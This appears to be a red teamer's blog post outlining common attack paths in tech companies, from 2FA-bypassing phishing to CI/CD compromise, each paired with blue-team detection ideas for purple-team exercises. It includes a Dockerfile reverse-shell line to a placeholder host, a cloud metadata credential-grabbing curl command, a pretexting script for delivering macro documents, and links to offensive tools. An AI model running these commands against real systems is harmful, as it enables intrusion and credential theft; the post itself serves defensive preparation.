Purple Team Candidates for Modern Tech Environments

Cedric Owens
Red Teaming with a Blue Team Mentality
15 min readSep 11, 2020

This post aims to discuss some decent purple team exercise inputs based on common red team techniques/attack paths along with defensive considerations in modern tech environments. This post is not all encompassing, but looks at some of the most likely attack paths along with some things blue teams can do to help posture for these attack paths (this may be proactive purple team exercise scenarios, hunting, table top exercises, etc.). As an offensive security engineer that has worked at SF Bay Area tech companies over the past 9 years, I focused this post on environments/tech stacks that are more prevalent with these types of companies.

Outside-In Attack Paths

  1. Phishing

Phishing still remains the top vector leveraged by remote attackers to gain access to an employee’s credentials or system. To help combat this, lots of organizations have started to roll out two factor authentication (2FA) so that credentials alone are not sufficient for authentication. However, over time attack capabilities have also evolved so that now there are tools/techniques available to bypass most forms of 2FA remotely (exception is U2F 2FA). Below are some common phishing tools that can bypass/capture 2FA protections used:

— — — — — — — — — — — — — —

  • Cred Harvest w/2FA Bypass Phishing

Example Tools: EvilGinx2 (https://github.com/kgretzky/evilginx2), CredSniper (https://github.com/ustayready/CredSniper), Modlishka (https://github.com/drk1wi/Modlishka)

Each of the three tools above work differently but in a nutshell each is able to capture/intercept credentials as well as 2FA tokens during the login process, allowing the attacker to obtain the cookie and login as the targeted user. This attack path would give the attacker access to a lot of important data sources, such as email, file storage, and various other apps (such as messaging apps or even apps that have access to sensitive data or customer information) if the target is a corporate identity as a service solution like okta or onelogin. I wrote a separate post on EvilGinx2 attacks on okta and onelogin portals here:

This attack path could be detrimental to an organization and the attacker may not even need to drop a shell on a system in order to access sensitive data. This attack path also may not be detected in various environments since it involves cloud or SAAS type services. So below are some blue team considerations for proactively looking at this attack path and looking at detections and response procedures:

Blue Team Considerations:

  • Can we identify suspicious login sources for our login portals?? A useful data point is the “New sign-on notification” for Okta (and similar equivalents for other providers) that essentially send an email notifying the user that a new portal sign on has been seen from a new source. If Okta is configured to alert for new sign on detections, this alert should always flag anytime an EvilGinx2 man in the middle attack has succeeded. So blue team receiving these alerts, and immediately reaching out to the identified user to investigate may help identify this attack early on.
  • Do we have the ability to identify compromised tokens/cookies for publicly facing login portals (ex: office 365, okta, onelogin, etc.)? One indicator might be any users logging in simultaneously from different geos/regions. There may be some edge cases where this happens in your environment but I think that would be a good starting point to drill down on.
  • Do we have the ability to revoke compromised tokens/cookies? If so, what does that workflow/process look like? Do we need to engage other teams to accomplish this? These are important questions because a simple password rotation on the compromised account would not be sufficient to boot an attacker using this attack path since the attacker would have valid login tokens/cookies which still are valid even after a password has been reset.
  • Specific to identity as a service login portals like okta and onelogin: Are there any apps/tiles that can be accessed remotely without needing VPN or 2FA once a user is logged in? This is something to consider because any key apps with sensitive information that are not protected by 2FA or VPN would be directly accessible by an attacker who has gained access to a target user’s login portal using one of the 2FA phishing tools above. Therefore I recommend that blue teams proactively look at this and work with the appropriate teams to move as many apps (especially those with sensitive content or with powerful access levels) behind VPN and 2FA. That way even if an attacker compromises a user’s credentials and access their login portal, very limited options are available to the attacker.

— — — — — — — — — — — — — —

  • Payload-Based Phishing

Another remote phishing vector would be payload-based phishing. With most tech Bay Area companies being primarily macOS user endpoints, I will focus on those types of payloads. These types of payloads may be sent as an attachment or as a link to download the payload from a remote server.

Example macOS Phishing Payloads:

  • Office docs with malicious macros: Example macro generator tools include macphish (https://github.com/cldrn/macphish) and a macro generator for EvilOSX that I wrote (https://github.com/cedowens/EvilOSX_MacroGenerator). In most instances these macros spawn the default macOS shell which then spawns python (which is where the post exploitation code is).
  • Blue Team Considerations: Check to see what type of parent child detections you have for macOS systems. Examples include any MS Office product spawning /bin/zsh, /bin/sh, or /bin/bash. Other examples include a single python parent process spawning several /bin/zsh, /bin/sh, or /bin/bash children over a short period of time. Also python spawning osascript may be of interest. These types of parent child relationship detections would find the macro activity from above. I have not yet found a solid way to run macros using Swift natively without needing a scripting language like python at all, but that would bypass these parent child process detections.
  • Malicious .app packages: After macOS 10.14.5, Apple required (via Gatekeeper) that any .app packages be both signed and notarized in order to help reduce the chances of malicious apps being executed on mac devices. However, the notarization process has been found to have its own set of issues in that several red team apps as well as real malware have been successfully notarized by Apple. You can read about the real malware examples here in Patrick Wardle’s blog: https://objective-see.com/blog/blog_0x4E.html. I also wrote up steps on how I was able to get my red team apps (JXA apps) signed and notarized by Apple in the past: https://medium.com/red-teaming-with-a-blue-team-mentaility/launching-apfell-programmatically-c90fe54cad89. Chris Ross (also known as xorrior) also wrote a post on another method to get red team apps notarized here: https://posts.specterops.io/sparkling-payloads-a2bd017095c.
  • Blue Team Considerations: By default, macOS apps have a unique user agent string used when making outbound web requests. This can certainly be changed, so this is a detection recommendation for apps that use the default user agents. Those user agents would be something like: <.app_name>/<.app_version> CFNetwork/<version> Darwin/<version>. So filtering and stacking on unique user agents observed across the network would help identify this type of activity. Another idea (may not be very feasible, depending on what capabilities are available in your environment) would be to inventory any unique apps downloaded to any of your mac endpoints and look at activity around those apps (ex: how they were downloaded and if anything else was downloaded around that time).
  • Malicious browser extensions: Chris Ross also wrote a post on how to build and deliver chrome extensions: https://posts.specterops.io/no-place-like-chrome-122e500e421f. Since most endpoint security products that I am aware of focus more on the endpoint, malicious browser extensions may still go undetected in various environments.
  • Blue Team Considerations: Since the delivery mechanism mentioned by Chris Ross in his post above is a silent delivery, he identified this as a detection methodology: look for variations of “profiles install” command line executions. This is because the actual command line execution in this case would be something like: profiles install -type=configuration -path=/path/to/profile.mobileconfig.
  • Masquerading Files: A recent threat intel report on Shlayer macOS malware discussed a real world example where users were being redirected to malicious sites that downloaded a .dmg which contained a shell script masquerading as a .app package along with instructions on how to run this shell script. The link to the article is here: https://www.intego.com/mac-security-blog/new-mac-malware-reveals-google-searches-can-be-unsafe/. Once the user downloaded the .dmg and executed the shell script (masquerading as a .app), it would launch an embedded .app package which would download flash along with malware. So even though this seems a bit on the low end from a sophistication perspective, this technique is recent and did infect some machines so it still works.
  • Blue Team Considerations: This attack is a bit more difficult to have a general recommendation for since this attack path can be implemented in various ways (ex: python instead of bash, downloading an app versus embedding one, etc.). However, I think this would serve as a fine purple team exercise where this type of attack can be run and then the team collaboratively searches for artifacts, processes, parent-child relationships, or any other anomalies that can be leveraged to build a meaningful detection. An example of how this might look is below:

2. Social Engineering

So phishing is technically social engineering, but I chose to break this out in order to dig more deeply into each. For social engineering, one interesting attack path is targeting any publicly facing teams/business units. Good examples of this include sales teams that take inbound calls or customer support teams that take cases from a phone line or support web form. Since these are ways/paths that members of the general public can interact with your employees, this warrants some attention from a defensive perspective. An example attack path for the sales team might be:

  1. Call the publicly facing sales phone number
  2. Pretend to be a business that is interested in the service/product
  3. Build rapport with the sales rep. Ask for their work email address for a follow-up message. Maybe even mention that you have a proposal document that you want them to view and will send it after the call
  4. Exchange some emails afterwards with follow-up questions to build more rapport
  5. Send the “proposal document” (which is a weaponized doc with a macro)
  6. Mention that your company does weird things with graphics and therefore macros must be enabled to view the content
  7. Wait and see what happens
  • Blue Team Considerations: This type of social engineering attack path could be used as an initial entry point into the environment. I recommend running this type of test internally and seeing how far you could get. The outcome of the test might be tightened security procedures around certain parts of the sales or support intake processes as well as some training on when and how to report suspicious requests or how to validate requestor identities. The end goal would be to prepare any publicly facing teams with a mindset of vigilance (i.e., “since you are a publicly facing team, you are likely to be targeted at some point, so here are procedures and steps we should follow…”) so that the team is prepared and responds in an adequate manner in the event they are targeted.

3. Public Asset Discovery

Knowledge of what services/servers/devices your organization has that are publicly exposed is essential to building a strategy around protecting those assets. Those assets may be hosted on-prem in a data center or may be hosted by a cloud provider. Some methods of discovery are listed below:

  • Searching internet registries for your company to get AS Numbers. This would include ARIN, AFRINIC, RIPE, LACNIC, and APNIC. Once you have the AS Numbers belonging to your company you can then find what network blocks correspond to each AS Number and those would be the public netblocks that your org owns and that you will want to canvas to see what is hosted publicly there.
  • Example Shodan searches: “net:[netblock]”, “org:[company]”, “ssl:[company]”, etc. The Shodan ssl search is very helpful with finding assets owned by your organization but that are hosted in cloud providers (ex: AWS, GCP, Azure, Digital Ocean, etc.).
  • Searching for open buckets: There are lots of tools out that can do this but one really neat tool that I learned about recently in Beau Bullock’s “Breaching The Cloud” course is cloud_enum: https://github.com/initstring/cloud_enum. This is a multi-cloud OSINT tool that aims to enumerate public resources in AWS, Azure, and GCP. You can feed it the domain for your company along with the names of key products or services and it will use that to try to find open buckets.
  • Cloud asset enumeration: Tools like Cloudbrute (https://github.com/0xsha/CloudBrute) can do this type of enumeration relatively quickly.
  • PowerMeta tool by Beau Bullock for finding publicly available files hosted on various websites using crafted Google and Bing searches: https://github.com/dafthack/PowerMeta
  • Searching for exposed secrets: There are lots of different approaches for searching for secrets (credentials, keys, tokens, etc.). Some helpful tools include gitrob (https://github.com/michenriksen/gitrob), gitleaks (https://github.com/zricethezav/gitleaks), and trufflehog (https://github.com/dxa4481/truffleHog). You can also use google dork searches for credentials for your org on pastebin, sensitive documents google dork searches, etc.
  • DNS subdomain brute forcing and certificate transparency logs: Both may be helpful with identifying additional hosts owned by your org. There are a ton of dns brute forcing tools. Gobuster is one of the really good tools out that can do dns brute forcing: https://github.com/OJ/gobuster.
  • Blue Team Considerations: I recommend that blue teams proactively get a pulse on what is publicly exposed using the methods above and by working with the teams that manage those parts of the company infrastructure. This would help with identifying who to reach out to during incidents affecting those assets. This would also give blue teams the chance to identify what assets they have logs for and to build a plan to gain the necessary log sources from hosts they do not have logs for.

4. Password Sprays

Password sprays have become an effective method for easily gaining access to additional accounts (especially if the password policy is weak such as 8 character min length). There are tons of different tools that are available for password spraying attacks as well. Examples are below:

  • Password Spray toolkit by byt3bl33d3r: https://github.com/byt3bl33d3r/SprayingToolkit
  • Microsoft Online Accounts Spray tool by Beau Bullock: https://github.com/dafthack/MSOLSpray
  • Okta Password Spray: https://github.com/cedowens/oktasprayer
  • Blue Team Considerations: I recommend checking to see what visibility you have into unsuccessful login attempts at your publicly facing login portals. If you do have visibility into unsuccessful login attempts, are you able to correlate them to identify all users that have been sprayed/attempted? Can you identify successes from password sprays? These would be helpful things to dig into during a purple team exercise.

Internal Attack Paths

There are also lots of internal attack paths that should be looked at. I will discuss some of those below:

  1. Internal Recon/Discovery:

Once an attacker has gained initial access, some level of recon and host discovery will likely occur in order to identify what other hosts/data/services to target. There are several ways that an attacker may go about this, but here are a few examples:

  • If an attacker lands on an Active Directory joined Windows host, the attacker may dump a list of all computers from AD, look for hosts with interesting names, and then start to probe those hosts to see what ports and services are exposed. The attacker may also dump a list of users and AD groups and in order to identify what users are high value users (have lots of access or who may have access to sensitive data). An attacker could also do an Active Directory password spray attack in order to attempt to gain additional accounts. Neat tool that does this by Beau Bullock: Active Directory Password Spray tool by Beau Bullock: https://github.com/dafthack/DomainPasswordSpray
  • The attacker could start port scans starting with the /24 subnet that the host they compromised is on
  • The attacker may attempt to access internal wiki, Sharepoint, Confluence, or Jira sites (or other similar products) in search of valuable information. Sometimes credentials, tokens, keys, network diagrams, installers, and other important information is hosted there and if there is no role based access implemented then an attacker may be able to view/access that information which could lead to further compromise.
  • If the host that an attacker compromises is an AWS or GCP host, the attacker may run a curl request against the metadata service in order to see if any credentials can be viewed. An example request might be: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/. Any exposed credentials there can be downloaded and used by an attacker to access additional resources/data.
  • Blue Team Considerations: Checking to see what type of visibility you have into port scans (what subnets can you see port scans on which ones can’t you see?) could help identify gaps. Proactively checking your internal wiki could also lead to finding all sorts of secrets/data that should not be there and you can work with the appropriate teams to proactively remove that content.

2. CI/CD Hosts/Flow:

Since almost every modern tech company is using CI/CD pipelines in order to consistently deploy software in a streamlined manner, the CI/CD pipeline will also be a target. Targeting the CI/CD pipeline could also provide a way to access production hosts without needing to pivot and overcome stringent network-based access controls. Some examples of things to look at are below:

  • Checking your CI hosts for misconfigurations. Often times Jenkins is used and one of the common misconfigurations with Jenkins is leaving the /script page up for remote access. If this happens, anyone who can browse to the /script page on that Jenkins host can compromise it by pasting a groovy reverse shell into the script execution window.
  • Blue Team Considerations: Proactively check each of your Jenkins hosts (in all environments…corp, dev, staging, and prod) and see if the /script page is exposed. If so, work with the teams to have it taken down. Even a dev or stage Jenkins host being compromised can lead to further compromise since secrets, keys, and other credentials are stored in Jenkins (and these creds might even work in prod).
  • Attempt to deploy malcode from your org’s git repo all the way through to production. This could be as simple as setting up a git repo with a Dockerfile that has the following content: “CMD (/bin/bash -i >& /dev/tcp/<IP>/<port> 0>&1)”. You could then trigger a Jenkins build and attempt to deploy to a dev, staging, or prod environment and see if you get access.
  • Blue Team Considerations: This is a simple test that can be run internally to see how far you can get and that would help gauge the effectiveness of pipeline controls. I recommend running this type of test proactively and working with the associated teams to add more stringent controls if you are able to deploy to prod with relative ease.

3. Secrets stored on user laptops:

Often in tech environments, engineers/developers will often do a lot of their engineering and development work from their laptops. In that case, they may be accessing cloud resources where they spin up environments for testing code ideas and concepts. With this setup, it is likely that the developers and engineers may have some secrets stored on their laptops (ex: aws keys, GCP keys, Azure keys, ssh keys). These secrets are often stored in plain text (or in a sqlite3 db that can be read from) and so accessing these secrets is pretty simple once an attacker gets access to an engineer’s laptop. I wrote a proof of concept tool for pulling this type of information from macOS hosts: https://github.com/cedowens/SwiftBelt. This can be used as a relatively easy and quick way to achieve lateral movement (or even privilege escalation) in an environment.

  • Blue Team Considerations: Detecting (with high fidelity) people accessing locally stored secrets is probably not really feasible. But perhaps there can be detections in place for anytime a key/token for a high powered account is used (or when a high valued asset is logged into)? Then you can baseline the usage of that key and respond accordingly when something outside of the norm surfaces. This may also be worth looking into during a purple team exercise.

4. Segmentation Between Environments:

Most modern tech companies include corp (where users live), dev (maybe staging too), and prod environments (where running apps and sensitive data may be stored). There are different methods used but often times there are network-based controls that separate these environments. A high level example is below:

It is always good to proactively assess the adequacy of these controls to verify they are working as expected and that there are no other ways around these controls that would allow someone in corp to go directly to prod and bypass controls.

  • Blue Team Considerations: I recommend proactively performing segmentation testing where you identify all of the subnet ranges for each of your environments and then starting in corp see what you can hit from the other environments (and do the same in staging and dev). Then you can note any anomalies and investigate with the proper teams for resolution.

The methods mentioned in this post are by no means all inclusive. These are just some common external and internal attack paths that I wanted to point out and identify ways that I think blue teams can proactively prepare for these types of attacks (potentially even using some of them as purple team scenarios). I hope you found this post useful!

--

--

Cedric Owens
Red Teaming with a Blue Team Mentality

Red teamer with blue team roots🤓👨🏽‍💻 Twitter: @cedowens